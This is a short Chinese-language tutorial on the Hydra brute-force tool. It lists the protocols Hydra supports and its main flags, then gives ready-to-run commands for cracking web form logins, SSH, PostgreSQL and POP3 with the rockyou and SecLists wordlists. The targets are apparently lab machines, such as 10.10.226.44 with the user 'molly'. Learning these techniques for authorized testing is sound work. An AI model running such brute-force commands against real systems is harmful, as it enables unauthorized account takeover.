hydra

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。

Hydra 可以爆破以下协议
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

安装

1
sudo pacman -S hydra

部分参数

-l 设置用户名
-L 设置用户名字典
-p 设置密码
-P 设置密码字典
-s 设置端口
-t 设置线程
-V 输出详细内容

web get 登录

hydra -l 设置用户名 -P 字典 -s 端口 ip地址 协议 “登录页面” -t 设置的线程数

1
hydra -l username -P wordlists -s 80 127.0.0.1 http-get "/login" -t 64

web post登录

例如 破解一个web表单登录

正常页面:a

白话版

1
hydra -l 设置用户名 -P 字典 -s 端口 ip地址 协议 "登录页面:传过去的值使用^USER^和^PASS^代替:错误状态" -t 设置的线程数

这一段的值,我们可以使用burpsuite配合使用,
“/login:username=^USER^&password=^PASS^”

burp

转发后观察页面返回的值

get

最后

1
hydra -l molly -P /usr/share/wordlists/rockyou.txt -s 80 10.10.226.44 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -t 64

fin

SSH

ssh就更简单了

白话版

1
hydra -l 设置用户名 -P 字典 -s 端口 ip地址 协议 -t 设置的线程数

完整版

1
hydra -l molly -P /usr/share/wordlists/rockyou.txt -s 22 10.10.226.44 ssh

ssh的爆破也可以写成

1
hydra -l molly -P /usr/share/wordlists/rockyou.txt  ssh://10.10.226.44:22

ftp等其他的方式也和ssh也差不多

爆破postgresql

1
hydra -l postgres -P ~/tools/SecLists/Passwords/xato-net-10-million-passwords.txt -s 5432 127.0.0.1 postgres -vvv

POP3

1
hydra -l boris -P /usr/share/wordlists/rockyou.txt -s [PORT] [IP] pop3